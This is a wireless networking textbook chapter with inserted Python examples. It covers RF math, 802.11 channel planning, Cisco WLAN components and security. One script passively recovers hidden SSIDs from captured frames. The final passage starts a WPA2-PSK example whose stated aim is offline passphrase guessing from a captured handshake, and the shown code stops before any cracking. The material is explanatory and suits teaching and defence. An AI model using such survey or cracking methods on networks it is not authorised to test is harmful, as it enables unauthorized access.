
The goal of this chapter is to introduce the Cisco Unified Wireless Network (UWN) architecture and to discuss wireless design principles. The chapter starts with an introduction to wireless technologies. Then the Cisco UWN is described. The chapter concludes with an exploration of considerations for designing Cisco UWNs in enterprise environments.

Introduction to Wireless Technology

This section includes some material from the Cisco Press title Building Cisco Multilayer Switched Networks (BCMSN) (Authorized Self-Study Guide), 4th Edition, ISBN 1-58705-273-3, as an introduction to wireless technology.

A wireless communication system uses radio frequency (RF) energy to transmit data from one point to another through the air; the term signal refers to this RF energy. The data to be transmitted is first modulated onto a carrier and then sent; receivers demodulate the signal and process the data.

There are many different types of wireless network technologies, each providing a defined coverage area. Figure 9-1 illustrates the following wireless technologies, along with a description of how the coverage areas are used:

  • Personal-area network (PAN): A PAN typically covers a person’s personal workspace.

  • Local-area network: Wireless LANs (WLAN) are designed to be enterprise-based networks that allow the use of complete suites of enterprise applications, without wires.

  • Metropolitan-area network (MAN): Wireless MANs are deployed inside a metropolitan area, allowing wireless connectivity throughout an urban area.

  • Wide-area network: Wireless WANs are typically slower but offer more coverage, such as across rural areas.

Figure 9-1: Wireless Technologies

WLANs replace the Layer 1 transmission medium of a traditional wired network (usually Category 5 cable) with radio transmission over the air. WLANs can plug into a wired network and function as an overlay to wired LANs, or they can be deployed as a standalone LAN where wired networking is not feasible. A computer with a wireless network interface card (NIC) connects to the wired LAN through an access point (AP). Properly deployed WLANs can provide instant access to the network from anywhere in a facility so that users can roam without losing their network connection.

WLANs use spread-spectrum RF signals on the three unlicensed bands: 900 MHz, 2.4 GHz, and 5 GHz. The 900 MHz and 2.4 GHz bands are referred to as the industrial, scientific, and medical (ISM) bands, and the 5 GHz band is commonly referred to as the Unlicensed National Information Infrastructure (UNII) band.

RF Theory

Radio frequencies are high-frequency AC signals radiated into the air via an antenna, creating radio waves. Radio waves propagate away from the antenna in a straight line in all directions at once, just as light from a light bulb does. And, just as more light bulbs spread around a room provide better overall lighting, more antennas spread around a room provide stronger RF signals for mobile clients.

Phenomena Affecting RF

When radio waves hit a wall, door, or any other obstruction, the signal is attenuated, or weakened, which might result in reduced throughput. The following natural phenomena affect RF signals, as illustrated in Figure 9-2:

  • Reflection: Occurs when the RF signal bounces off objects such as metal or glass surfaces.

  • Refraction: Occurs when the RF signal passes through objects such as glass surfaces and changes direction.

  • Absorption: Occurs when an object, such as a wall or furniture, absorbs the RF signal.

  • Scattering: Occurs when an RF wave strikes an uneven surface and reflects in many directions. Scattering also occurs when an RF wave travels through a medium that consists of objects that are much smaller than the signal’s wavelength, such as heavy dust.

  • Diffraction: Occurs when an RF wave strikes sharp edges, such as external corners of buildings, which bend the signal.

  • Multipath: Occurs when an RF signal has more than one path between the sender and receiver. The multiple signals at the receiver might result in a distorted, low-quality signal.

Figure 9-2: RF Phenomena

Consider all these phenomena when designing, implementing, and troubleshooting WLANs.

RF Math

WLANs transmit signals just as radio stations do to reach their listeners. The transmit power levels for WLANs are in milliwatts (mW), whereas broadcast radio stations transmit at kilowatts or more.

The following are some units of measure used in RF calculations:

  • Decibel (dB): The difference or ratio between two signal levels. Decibels are used to measure relative gains or losses in an RF system and to describe the effect of system devices on signal strength. The dB is named after Alexander Graham Bell.

  • dB milliwatt (dBm): A signal strength or power level. Zero dBm is defined as 1 mW of power into a terminating load such as an antenna or power meter. Signals below 1 mW are therefore negative numbers (such as -80 dBm); received WLAN signals are typically in the range of -60 dBm to -80 dBm.

  • dB watt (dBW): A signal strength or power level. Zero dBW is defined as 1 watt (W) of power; 1 W is one ampere (A) of current at 1 volt (V).

  • dB isotropic (dBi): The gain a given antenna has over a theoretical isotropic (point source) antenna. An isotropic antenna cannot be made in the real world, but it is useful as a reference for calculating theoretical system operating margins.

Because decibels are logarithmic, the gains and losses in a WLAN system can be added and subtracted instead of multiplied: sum the gains and losses in dB, then convert the result into an absolute power in milliwatts or watts. The conversion itself requires a logarithm, so it is normally done with a calculator or a table.

The following formula converts a transmit power in milliwatts to dBm:

Transmit Power (dBm) = 10 * log10[Transmit Power (mW)]

Table 9-1 indicates how various gains and losses relate to power levels; it is useful for WLAN calculations.

Table 9-1: dBm-to-milliwatt Conversion Table

  dBm    mW        dBm    mW
  -3     0.5       10     10
   0     1         20     100
   3     2         30     1,000 (1 W)
   6     4         40     10,000 (10 W)
   9     8         50     100,000 (100 W)
  12     16        60     1,000,000 (1,000 W)

Notice in Table 9-1 that RF math is easier when the following key points are considered:

  • Every gain of 3 dB means that the power is doubled. A loss of 3 dB means that the power is cut in half.

  • A gain of 10 dB means that the power increases by a factor of 10. A loss of 10 dB means that the power decreases by a factor of 10.

To calculate the power increase or decrease for a given number of decibels, factor the number into a sum of 3 dB and 10 dB steps, and then convert using these rules. For example, a 9 dB loss is equivalent to 3 dB + 3 dB + 3 dB. The following illustrates how to calculate the power level that a 200 mW signal decreases to when it experiences a 9 dB loss:

  • 200 mW - 3 dB = 100 mW

  • 100 mW - 3 dB = 50 mW

  • 50 mW - 3 dB = 25 mW

Therefore, the 200 mW signal decreases to 25 mW with a 9 dB loss. Note that dB expresses a ratio (a gain or loss), whereas dBm expresses an absolute level; gains and losses are given in dB and the resulting power in dBm or mW.
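The dBm/mW conversion and the rule of 3s and 10s above, implemented as an added Python example (this is not code from the chapter). It carries the chapter's 200 mW, 9 dB loss case through both the exact logarithm and the approximation, generalizes the rule so that any integer dB value is decomposed into 10 dB and 3 dB steps (including negative steps, so that 7 dB becomes +10 dB then -3 dB), and adds a link-budget helper that sums transmit power, cable loss and antenna gain in dB before converting back. The radio power, cable loss, antenna gains and path loss used in worked_example() are constructed assumptions, not figures from the chapter.

```python
import math
from typing import Tuple


def mw_to_dbm(mw: float) -> float:
    """Absolute power: dBm = 10 * log10(P_mW / 1 mW). 0 dBm is 1 mW."""
    if mw <= 0:
        raise ValueError("power must be positive")
    return 10.0 * math.log10(mw)


def dbm_to_mw(dbm: float) -> float:
    """Inverse of mw_to_dbm: P_mW = 10 ** (dBm / 10)."""
    return 10.0 ** (dbm / 10.0)


def apply_db(mw: float, db: float) -> float:
    """Exact: apply a relative gain (+dB) or loss (-dB) to a power in mW.
    Adding dB values multiplies the powers, so the factor is 10 ** (dB / 10)."""
    return mw * 10.0 ** (db / 10.0)


def rule_of_3s_and_10s(db: int) -> Tuple[int, int, float]:
    """Decompose an integer dB change into a*10 + b*3 and return (a, b, factor),
    where the approximate power factor is 10**a * 2**b (x10 per 10 dB, x2 per 3 dB).
    3 and 10 are coprime, so every integer is reachable with |b| <= 9."""
    for b in range(-9, 10):
        if (db - 3 * b) % 10 == 0:
            a = (db - 3 * b) // 10
            return a, b, (10.0 ** a) * (2.0 ** b)
    raise AssertionError("unreachable: every integer is a*10 + b*3")


def approx_apply_db(mw: float, db: int) -> float:
    """Mental-math version of apply_db using the rule of 3s and 10s.
    The error comes from 2 != 10**0.3 (1.995...), so it grows with the number of 3 dB steps."""
    return mw * rule_of_3s_and_10s(db)[2]


def link_budget(tx_dbm: float, tx_cable_loss_db: float, tx_antenna_dbi: float,
                path_loss_db: float, rx_antenna_dbi: float = 0.0,
                rx_cable_loss_db: float = 0.0) -> Tuple[float, float]:
    """Sum gains and losses in dB, then report (EIRP dBm, received level dBm).
    EIRP = transmitter output - cable loss + antenna gain; the receiver sees
    EIRP - path loss + its own antenna gain - its own cable loss."""
    eirp = tx_dbm - tx_cable_loss_db + tx_antenna_dbi
    rx = eirp - path_loss_db + rx_antenna_dbi - rx_cable_loss_db
    return eirp, rx


def worked_example() -> dict:
    """The chapter's case (200 mW with a 9 dB loss) plus a constructed link budget:
    a 100 mW (20 dBm) radio, 3 dB of cable loss, a 6 dBi antenna, 80 dB of path
    loss and a 2 dBi client antenna. These numbers are assumptions for illustration."""
    exact = apply_db(200.0, -9)
    approx = approx_apply_db(200.0, -9)
    eirp, rx = link_budget(mw_to_dbm(100.0), 3.0, 6.0, 80.0, 2.0)
    return {
        "exact_mw": round(exact, 2),          # 25.18 mW from the logarithm
        "approx_mw": approx,                  # 25.0 mW by halving three times
        "eirp_dbm": eirp,                     # 20 - 3 + 6 = 23 dBm
        "eirp_mw": round(dbm_to_mw(eirp), 1),
        "rx_dbm": rx,                         # 23 - 80 + 2 = -55 dBm
    }


if __name__ == "__main__":
    for name, value in worked_example().items():
        print(f"{name:>10}: {value}")
```

The exact and approximate results for the chapter's case differ by less than 1 percent; for larger numbers of 3 dB steps the gap widens, which is why a table or calculator is preferred when a margin is tight.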

Antennas

Antennas used in WLANs come in many shapes and sizes, depending on the differing RF characteristics desired. The physical dimensions of an antenna directly relate to the frequency at which the antenna transmits or receives radio waves. As the gain increases, the coverage area becomes more focused. High-gain antennas provide longer coverage areas than low-gain antennas at the same input power level. As frequency increases, the wavelength and the antennas become smaller. Antennas can be categorized into one of the three following types:

  • Omnidirectional: These antennas are the most widely used today but are not always the best solution. The radiant energy is shaped like a doughnut; consequently, the transmit signal is weak or absent directly under the AP (in the “hole” of the doughnut).

  • Semidirectional: These antennas offer the capability to direct and apply gain to the signal. The radiant energy is in a cowbell shape.

  • Highly directional: These antennas are intended for highly directed signals that must travel a long distance. The radiant energy is in a telescope shape.

Agencies and Standards Groups

Some of the agencies and standards groups related to WLANs are as follows:

  • Institute of Electrical and Electronics Engineers (http://www.ieee.org/): Creates and maintains operational standards.

  • European Telecommunications Standards Institute (http://www.etsi.org/): Chartered to produce common standards in Europe.

  • Wi-Fi Alliance (http://www.wi-fi.com/): Promotes and tests for WLAN interoperability.

  • WLAN Association (http://www.wlana.org/): Educates and raises consumer awareness about WLANs.

  • FCC (http://www.fcc.gov/): Regulates United States interstate and international communications by radio, television, wire, satellite, and cable.

  • Canadian Radio-Television and Telecommunications Commission (http://www.crtc.gc.ca/): Regulates Canada’s broadcasting and telecommunications systems.

IEEE 802.11 Operational Standards

In September 1999 the IEEE ratified the IEEE 802.11a standard (5 GHz at 54 Mbps) and the IEEE 802.11b standard (2.4 GHz at 11 Mbps). In June 2003, the IEEE ratified the 802.11g standard (2.4 GHz at 54 Mbps); this standard is backward-compatible with 802.11b systems, because both use the same 2.4 GHz band. The following are the existing IEEE 802.11 standards for wireless communication:

  • 802.11a: 54 Mbps at 5 GHz, ratified in 1999

  • 802.11b: 11 Mbps at 2.4 GHz, ratified in 1999

  • 802.11d: World mode, ratified in 2001

  • 802.11e: Quality of service, ratified in 2005

  • 802.11F: Inter-Access Point Protocol, withdrawn in 2006

  • 802.11g: 54 Mbps at 2.4 GHz, higher data rate than 802.11b, ratified in 2003

  • 802.11h: Dynamic frequency selection and transmit power control mechanisms, ratified in 2003

  • 802.11i: Authentication and security, ratified in 2005

  • 802.11j: Additional Japanese frequencies, ratified in 2005

  • 802.11k: Radio resource management draft, planned to be ratified in 2007

  • 802.11n: High-throughput draft, planned to be ratified in 2007

IEEE 802.11b/g Standards in the 2.4 GHz Band

The 2.4 GHz band used for 802.11b/g has multiple channels, each 22 MHz wide. In North America, 11 channels are defined, as illustrated in Figure 9-3. The top of the figure shows each channel’s center frequency (which is the frequency by which the channel is known); the lower numbers show the channel’s starting frequency. In North America, the 2.4 GHz band has three nonoverlapping channels: channels 1, 6, and 11.

Figure 9-3: 2.4 GHz Channels in North America

Careful channel placement eliminates overlapping cells on the same channel so that aggregate WLAN throughput is maximized. This concept is similar to the placement of FM radio stations throughout the country; two radio stations in the same geographic area are never on the same frequency.

Therefore, three APs, using the three nonoverlapping channels, can operate in the same area without sharing the medium. For example, an AP on channel 1 does not have any frequencies in common with an AP on channel 6 or with an AP on channel 11. Therefore, there is no degradation in throughput when three APs are in the same area if they are each on a nonoverlapping channel. Figure 9-4 illustrates how 802.11b/g cells can be placed so that no neighboring cells are on the same or overlapping channels.

Figure 9-4: 2.4 GHz Channel Placement

Different countries allow different channels and transmit power levels.


Note

802.11g is backward-compatible with 802.11b. The 802.11g specification uses orthogonal frequency division multiplexing (OFDM) modulation for 802.11g data rates and complementary code keying (CCK) modulation for 802.11b data rates.

Multipath interference is more of an issue with 802.11b. Some Cisco APs reduce multipath interference by providing multiple antennas; this feature is called antenna diversity. The device selects the antenna from which the best signal is received. For example, a typical Linksys wireless router has two “rubber duck” antennas. However, only one antenna is used at a time, the one that experiences the least multipath distortion of the signal.

The 802.11g data rates are 54, 48, 36, 24, 18, 12, 9, and 6 Mbps. The 802.11b data rates are 11, 5.5, 2, and 1 Mbps. Figure 9-5 compares the 2.4 GHz common data rates and ranges for 802.11b/g.

Figure 9-5: 2.4 GHz 802.11b/g Common Data Rate and Range Comparison

Note

Higher data rates require more complex modulation than lower data rates. A greater signal-to-noise ratio is required to receive a signal with more complex modulation. Therefore, higher data rates can be received only at shorter distances, because signal strength decreases with distance while the noise floor (level) stays constant. At greater distances, the signal-to-noise ratio is lower than it is at shorter distances.

802.11a Standard in the 5-GHz Band

The 5 GHz UNII band can be divided into multiple channels, depending on the regulations that vary by country. The U.S. now has three separate 100 MHz wide bands known as the lower, middle, and upper bands. Within each of these three bands are four nonoverlapping channels. In the U.S., the FCC specifies that the lower band is for indoor use, the middle band is for indoor and outdoor use, and the upper band is for outdoor use. Figure 9-6 illustrates the nonoverlapping 802.11a channels.

Figure 9-6: 5 GHz 802.11a Nonoverlapping Channels

802.11a uses the same OFDM modulation and supports the same data rates as 802.11g. Figure 9-7 shows the 802.11a common data rates and ranges.

Figure 9-7: 5 GHz 802.11a Common Data Rates and Ranges

802.11a channel placement is easier to plan than 802.11b/g, because 802.11a has 12 nonoverlapping channels that allow a simpler channel reuse scheme. However, the nonoverlapping channels for 802.11a (as shown in Figure 9-6) are close enough to each other that some clients might experience interference from adjacent channels (called side-band or side-channel interference). As a result, the recommendation for 802.11a is that neighboring cells not be placed on neighboring channels (in other words, neighboring channels are skipped) to reduce interference. Figure 9-8 illustrates 802.11a channel placement.

Figure 9-8: 5 GHz Channel Placement

Note that the 802.11a coverage area is smaller than the 802.11b/g coverage area, requiring more APs on a per-area basis.
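Channel overlap and cell placement for both bands, as an added Python example that is not code from the chapter. It derives center frequencies from channel numbers (2407 + 5 × n MHz in the 2.4 GHz band, 5000 + 5 × n MHz at 5 GHz), treats two channels as overlapping when their centers are closer than one channel width (22 MHz for 802.11b/g, 20 MHz for 802.11a), recovers the 1/6/11 set of Figure 9-4 by exhaustive search, and then checks a constructed AP layout for neighboring cells on overlapping channels, or, for 802.11a, on directly adjacent channels, which Figure 9-8 recommends skipping. The AP names, coordinates and cell radii are constructed assumptions.

```python
import math
from itertools import combinations
from typing import Dict, List, Sequence, Set, Tuple

# Occupied bandwidth per channel: 802.11b/g in 2.4 GHz uses 22 MHz channels,
# 802.11a OFDM in 5 GHz uses 20 MHz channels.
CHANNEL_WIDTH_MHZ: Dict[str, int] = {"2.4": 22, "5": 20}

# The 12 802.11a channels the chapter refers to: lower, middle and upper UNII bands.
UNII_CHANNELS = [36, 40, 44, 48, 52, 56, 60, 64, 149, 153, 157, 161]

# Constructed AP layout entry: (name, x, y, channel, cell radius) in arbitrary distance units.
AP = Tuple[str, float, float, int, float]


def center_mhz(band: str, ch: int) -> int:
    """Center frequency of an 802.11 channel number."""
    if band == "2.4":
        if ch == 14:
            return 2484                 # Japan-only channel, off the 5 MHz grid
        if 1 <= ch <= 13:
            return 2407 + 5 * ch        # channel 1 = 2412 MHz, 6 = 2437, 11 = 2462
    elif band == "5":
        return 5000 + 5 * ch            # channel 36 = 5180 MHz
    raise ValueError(f"channel {ch} is not defined in the {band} GHz band")


def overlaps(band: str, a: int, b: int) -> bool:
    """Two channels overlap when their centers are closer than one channel width."""
    return abs(center_mhz(band, a) - center_mhz(band, b)) < CHANNEL_WIDTH_MHZ[band]


def largest_nonoverlapping_sets(band: str, channels: Sequence[int]) -> List[Set[int]]:
    """Brute-force the largest sets of mutually nonoverlapping channels."""
    for k in range(len(channels), 0, -1):
        found = [set(c) for c in combinations(channels, k)
                 if not any(overlaps(band, a, b) for a, b in combinations(c, 2))]
        if found:
            return found
    return []


def plan_conflicts(band: str, aps: Sequence[AP], skip_adjacent: bool = False) -> List[Tuple[str, str, str]]:
    """Flag neighboring cells (coverage circles that intersect) whose channels overlap.
    With skip_adjacent=True, also flag neighbors on directly adjacent 5 GHz channels,
    which the chapter recommends avoiding because of side-channel interference."""
    problems = []
    for (n1, x1, y1, c1, r1), (n2, x2, y2, c2, r2) in combinations(aps, 2):
        if math.hypot(x1 - x2, y1 - y2) >= r1 + r2:
            continue                    # cells do not touch, so any channel pair is fine
        separation = abs(center_mhz(band, c1) - center_mhz(band, c2))
        if overlaps(band, c1, c2):
            problems.append((n1, n2, "overlapping channels"))
        elif skip_adjacent and separation == CHANNEL_WIDTH_MHZ[band]:
            problems.append((n1, n2, "adjacent channels"))
    return problems


# A constructed 2.4 GHz plan in the Figure 9-4 style: neighbors alternate 1, 6 and 11.
GOOD_PLAN: List[AP] = [
    ("A", 0.0, 0.0, 1, 7.0), ("B", 10.0, 0.0, 6, 7.0), ("C", 20.0, 0.0, 11, 7.0),
    ("D", 5.0, 9.0, 11, 7.0), ("E", 15.0, 9.0, 1, 7.0),
]
# The same layout with E moved onto channel 6, so it shares a channel with its neighbor B.
BAD_PLAN: List[AP] = GOOD_PLAN[:4] + [("E", 15.0, 9.0, 6, 7.0)]


if __name__ == "__main__":
    print("2.4 GHz largest nonoverlapping sets:", largest_nonoverlapping_sets("2.4", range(1, 12)))
    print("5 GHz mutually nonoverlapping channels:", len(largest_nonoverlapping_sets("5", UNII_CHANNELS)[0]))
    print("good plan conflicts:", plan_conflicts("2.4", GOOD_PLAN))
    print("bad plan conflicts:", plan_conflicts("2.4", BAD_PLAN))
    print("5 GHz neighbors on 36/40:",
          plan_conflicts("5", [("A", 0, 0, 36, 7), ("B", 10, 0, 40, 7)], skip_adjacent=True))
```

The search confirms that with 22 MHz channels on a 5 MHz grid, {1, 6, 11} is the only three-channel set in the North American allocation, and that all twelve 802.11a channels are mutually nonoverlapping, which is why the 5 GHz check only needs the adjacent-channel rule.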

802.11 WLANs Versus 802.3 Ethernet LANs

Both 802.11 WLANs and 802.3 Ethernet wired LANs define the physical and data link layers, use MAC addresses, and support the same upper-layer protocols. Both use Carrier Sense Multiple Access to control access to the media: Ethernet uses collision detection (CSMA/CD), whereas 802.11 WLANs use collision avoidance (CSMA/CA).

All the stations in a WLAN cell share the bandwidth, and the radio is half-duplex: a sending station cannot receive at the same time it is transmitting, so it cannot detect whether another station is transmitting at the same time. This is why collision detection is not possible on WLANs. Instead, stations avoid collisions by waiting for the medium to be idle plus a random backoff before transmitting and by requiring an acknowledgment for each unicast frame; optional request-to-send and clear-to-send (RTS/CTS) messages reserve the medium before longer frames are sent.

WLAN Topologies

Cisco wireless products support the following three topologies:

  • Wireless client access: For mobile user connectivity

  • Wireless bridging: To interconnect LANs that are physically separated, for example, in different buildings

  • Wireless mesh networking: To provide both client access and a dynamic, redundant connection between buildings

WLAN Components

Client devices use wireless NICs or adapters to connect to a wireless network in either ad hoc (peer-to-peer) mode or infrastructure mode using APs. Cisco APs can be either autonomous or lightweight.


Note

Autonomous APs used to be called thick, fat, or decentralized APs, whereas lightweight APs were called thin or centralized APs.

These components are described in the following sections.

Cisco-Compatible WLAN Clients

The Cisco Compatible Extensions (CCX) program for WLAN client devices allows vendors of WLAN client devices or adapters to ensure interoperability with the Cisco WLAN infrastructure and take advantage of Cisco innovations. Wireless client products are submitted to an independent lab for rigorous testing; passing this testing process allows the devices to be marketed as Cisco Compatible client devices. There are four versions of the Cisco Compatible specification, versions 1 through 4. Each version builds on its predecessors; with a few exceptions, every feature that must be supported in one version must also be supported in each subsequent version.

Autonomous APs

CiscoWorks Wireless LAN Solution Engine (WLSE) is a turnkey and scalable management platform for managing hundreds to thousands of Cisco Aironet autonomous APs and wireless bridges. Autonomous APs may also be managed with CiscoWorks WLSE Express, a complete WLAN management solution with an integrated authentication, authorization, and accounting (AAA) server for small to medium-sized enterprise facilities or branch offices using Cisco Aironet autonomous APs and wireless bridges.

Lightweight APs

Wireless LAN controllers (WLC) and lightweight APs communicate over any Layer 2 (Ethernet) or Layer 3 (IP) infrastructure using the Lightweight AP Protocol (LWAPP) to support automation of numerous WLAN configuration and management functions. WLCs are responsible for centralized systemwide WLAN management functions, such as security policies, intrusion prevention, RF management, quality of service (QoS), and mobility.

A Cisco wireless location appliance may be added to track the location of wireless devices.

AP Power

One issue for WLANs is that power might not be available where APs need to be located. Two solutions to this issue are Power over Ethernet (PoE) and power injectors. PoE, or inline power, provides operating current to a device, such as an AP, from an Ethernet port, over the Category 5 cable.


Note

The IEEE 802.3af standard defines PoE. In addition, some Cisco devices support a prestandard proprietary method of powering devices over Ethernet. An optional power classification feature allows switches to recognize powered devices and identify their power requirements.

A midspan power injector is a standalone unit that adds PoE capability to existing networking equipment. The power injector is inserted into the LAN between the Ethernet switch and the device requiring power, such as an AP.

WLAN Operation

If a single cell does not provide enough coverage, any number of cells can be added to extend the range to an extended service area (ESA). It is recommended that the ESA cells have 10 to 15 percent overlap to allow remote users to roam without losing RF connections. If VoIP is implemented in the wireless network, it is recommended that the ESA cells have a 15 to 20 percent overlap. As discussed earlier, bordering cells should be set to different nonoverlapping channels for best performance.

An SSID on an AP and on an associated client must match exactly. APs broadcast their SSIDs in beacons, announcing their available services; clients associate with a specific SSID or learn the available SSIDs from the beacons and choose one with which to associate.

APs can be configured not to broadcast a particular SSID in their beacons, but the SSID is still sent in cleartext in the probe responses and association requests exchanged whenever a client joins, and it is therefore discoverable by wireless survey tools that listen for those frames. Configuring the AP not to broadcast an SSID is thus not considered a strong security mechanism by itself. This feature should be combined with some of the stronger mechanisms discussed in the next section.
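To see why a hidden SSID is still discoverable, the following added Python example (not code from the chapter or from any Cisco tool) builds a few 802.11 management frames from constructed sample data and then runs a minimal passive survey over them: it parses the 24-byte management header and the tagged information elements, treats a beacon whose SSID element is empty or null-padded as hidden, recovers the name from the probe response and association request of the same BSSID, and separately records the SSIDs that clients name in their directed probe requests. The MAC addresses, SSIDs and frames are all constructed; only the standard library is used.

```python
import struct
from typing import Dict, List, Optional, Set, Tuple

# Management frame subtypes (frame control: type 0 in bits 2-3, subtype in bits 4-7).
ASSOC_REQ, PROBE_REQ, PROBE_RESP, BEACON = 0, 4, 5, 8
SSID_ELEMENT_ID = 0
MGMT_HEADER = "<HH6s6s6sH"          # frame control, duration, addr1 (DA), addr2 (SA), addr3 (BSSID), seq ctrl
# Bytes of fixed fields that precede the information elements, per subtype.
FIXED_FIELDS = {BEACON: 12, PROBE_RESP: 12, ASSOC_REQ: 4, PROBE_REQ: 0}


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def element(eid: int, data: bytes) -> bytes:
    """One tagged parameter: element id, length, value."""
    return struct.pack("BB", eid, len(data)) + data


def mgmt_frame(subtype: int, da: bytes, sa: bytes, bssid: bytes, body: bytes) -> bytes:
    frame_control = subtype << 4    # protocol version 0, type 0 (management)
    return struct.pack(MGMT_HEADER, frame_control, 0, da, sa, bssid, 0) + body


def parse_elements(data: bytes) -> Dict[int, List[bytes]]:
    """Walk the id/length/value list; stop cleanly on a truncated element."""
    elements: Dict[int, List[bytes]] = {}
    i = 0
    while i + 2 <= len(data):
        eid, length = data[i], data[i + 1]
        if i + 2 + length > len(data):
            break
        elements.setdefault(eid, []).append(data[i + 2:i + 2 + length])
        i += 2 + length
    return elements


def parse_mgmt(frame: bytes) -> Optional[dict]:
    """Return subtype, source, BSSID and SSID (None when the SSID is hidden or absent)."""
    if len(frame) < struct.calcsize(MGMT_HEADER):
        return None
    fc, _dur, _da, sa, bssid, _seq = struct.unpack_from(MGMT_HEADER, frame, 0)
    if (fc & 0x0C) != 0:            # type bits must be 00 (management)
        return None
    subtype = (fc >> 4) & 0x0F
    if subtype not in FIXED_FIELDS:
        return None
    elements = parse_elements(frame[24 + FIXED_FIELDS[subtype]:])
    raw_ssid = elements.get(SSID_ELEMENT_ID, [b""])[0]
    hidden = len(raw_ssid) == 0 or all(b == 0 for b in raw_ssid)   # empty or null-padded
    return {"subtype": subtype, "sa": mac_str(sa), "bssid": mac_str(bssid),
            "ssid": None if hidden else raw_ssid.decode("utf-8", "replace")}


def survey(frames: List[bytes]) -> Tuple[Dict[str, dict], Dict[str, Set[str]]]:
    """Correlate frames by BSSID the way a passive survey tool does. Returns the networks
    seen and, separately, the SSIDs each client asked for in directed probe requests."""
    networks: Dict[str, dict] = {}
    client_probes: Dict[str, Set[str]] = {}
    for frame in frames:
        p = parse_mgmt(frame)
        if p is None:
            continue
        if p["subtype"] == PROBE_REQ:   # wildcard BSSID, but the client names the SSID it wants
            if p["ssid"] is not None:
                client_probes.setdefault(p["sa"], set()).add(p["ssid"])
            continue
        net = networks.setdefault(p["bssid"], {"ssid": None, "hidden_beacon": False, "learned_from": None})
        if p["subtype"] == BEACON and p["ssid"] is None:
            net["hidden_beacon"] = True
        elif p["ssid"] is not None and net["ssid"] is None:
            net["ssid"], net["learned_from"] = p["ssid"], p["subtype"]
    return networks, client_probes


# Constructed sample capture: AP1 hides its SSID, AP2 advertises "Guest", one client joins AP1.
AP1, AP2 = bytes.fromhex("020000000001"), bytes.fromhex("020000000002")
CLIENT, BROADCAST = bytes.fromhex("020000000010"), b"\xff" * 6
BEACON_FIXED = struct.pack("<QHH", 0, 100, 0x0011)   # timestamp, beacon interval, capability (ESS + privacy)
SAMPLE_FRAMES = [
    mgmt_frame(BEACON, BROADCAST, AP1, AP1, BEACON_FIXED + element(SSID_ELEMENT_ID, b"")),
    mgmt_frame(BEACON, BROADCAST, AP2, AP2, BEACON_FIXED + element(SSID_ELEMENT_ID, b"Guest")),
    mgmt_frame(PROBE_REQ, BROADCAST, CLIENT, BROADCAST, element(SSID_ELEMENT_ID, b"CorpWiFi")),
    mgmt_frame(PROBE_RESP, CLIENT, AP1, AP1, BEACON_FIXED + element(SSID_ELEMENT_ID, b"CorpWiFi")),
    mgmt_frame(ASSOC_REQ, AP1, CLIENT, AP1, struct.pack("<HH", 0x0011, 10) + element(SSID_ELEMENT_ID, b"CorpWiFi")),
]

if __name__ == "__main__":
    nets, probes = survey(SAMPLE_FRAMES)
    for bssid, info in nets.items():
        print(bssid, info)
    print("client probes:", probes)
```

The survey learns "CorpWiFi" for the hiding AP from the first probe response, and the client's directed probe request leaks the same name even before the AP answers; a real survey tool does the same over live captures.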

APs can have up to 16 SSIDs; VLANs are extended to the wireless network by mapping VLANs to SSIDs.

WLAN Security

WLAN security includes the following:

  • Authentication: Ensures that only legitimate clients access the network via trusted APs.

  • Encryption: Ensures the confidentiality of transmitted data.

  • Intrusion detection and intrusion protection: Monitors, detects, and mitigates unauthorized access and attacks against the network.

Initially, basic 802.11 WLAN security was provided via Wired Equivalent Privacy (WEP) authentication and encryption, using static keys. With static WEP, the encryption keys must match on both the client and the access point. Unfortunately, the keys are relatively easy to compromise, so static WEP is no longer considered secure.

While the 802.11 committee was developing a more robust standard security solution, vendors incorporated IEEE 802.1X port-based authentication carrying the Extensible Authentication Protocol (EAP) to authenticate users via a RADIUS authentication server, such as Cisco Secure Access Control Server (ACS), and to enforce security policies for them. Basing the authentication transaction on users, rather than on machine credentials, reduces the risk of security compromise from lost or stolen equipment. 802.1X authentication also permits flexible credentials to be used for client authentication, including passwords, one-time tokens, public key infrastructure (PKI) certificates, and device IDs.

When 802.1X is used for wireless client authentication, dynamic encryption keys can be distributed to each user, each time that user authenticates on the network. The Wi-Fi Alliance also introduced Wi-Fi Protected Access (WPA) to enhance encryption and protect against all known WEP key vulnerabilities. WPA includes the Temporal Key Integrity Protocol (TKIP) to provide per-packet keying that protects the WEP key from exploits that seek to derive the key using packet comparison, and a message integrity check (MIC) to protect against packet forgery and replay. The MIC protects the wireless system from inductive attacks that seek to induce the system to send either key data or a predictable response that can be compared to known data to derive the WEP key.

In late 2001, Cisco implemented a prestandard version of TKIP and MIC, now called Cisco Key Integrity Protocol and Cisco Message Integrity Check, respectively. Cisco devices also now support the standard TKIP and MIC.

The IEEE 802.11i standard now encompasses a number of security improvements, including those implemented in WPA. 802.1X authentication is still used; however, 802.11i specifies the use of the Advanced Encryption Standard (AES), in the AES-CCMP cipher mode, in place of the RC4-based WEP and TKIP ciphers. AES is a stronger algorithm than WEP, but it is more CPU-intensive and therefore requires updated hardware to run AES encryption while maintaining comparable throughput. The Wi-Fi Alliance interoperable implementation of 802.11i with AES is called WPA2.


Note

WPA and WPA2 can also use a preshared key (PSK) instead of 802.1X when a RADIUS server is not available, for example, for home users. A PSK is similar to a password: before communication starts, the same passphrase is configured on both devices (it is preshared), and the devices authenticate each other by proving possession of the key derived from it. Because that key is derived only from the passphrase and the SSID, the security of PSK mode rests entirely on the passphrase; an attacker who captures the initial key exchange can test candidate passphrases offline, so short or dictionary passphrases are easily recovered.
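The preshared-key mode of the note above, worked through as an added Python example (not code from the chapter or from any Cisco product): the pairwise master key (PMK) is PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt (4096 iterations, 256 bits); the pairwise transient key (PTK) is expanded from the PMK, both MAC addresses and both nonces with the 802.11i PRF; and the key confirmation key (the first 128 bits of the PTK) authenticates the EAPOL-Key frames of the 4-way handshake with HMAC-SHA1 truncated to 128 bits, the WPA2/AES key descriptor version. Because everything except the passphrase crosses the air in the clear, the example then recovers a weak passphrase offline from one captured handshake message and a short wordlist. The SSID, MAC addresses, nonces, wordlist and EAPOL frame are constructed; only the standard library is used.

```python
import hashlib
import hmac
import struct
from typing import Iterable, Optional

EAPOL_MIC_OFFSET = 81       # position of the 16-byte MIC inside an EAPOL-Key frame (see eapol_key_frame)
PTK_LEN_CCMP = 48           # KCK (16) + KEK (16) + TK (16) for CCMP


def wpa_pmk(passphrase: str, ssid: bytes) -> bytes:
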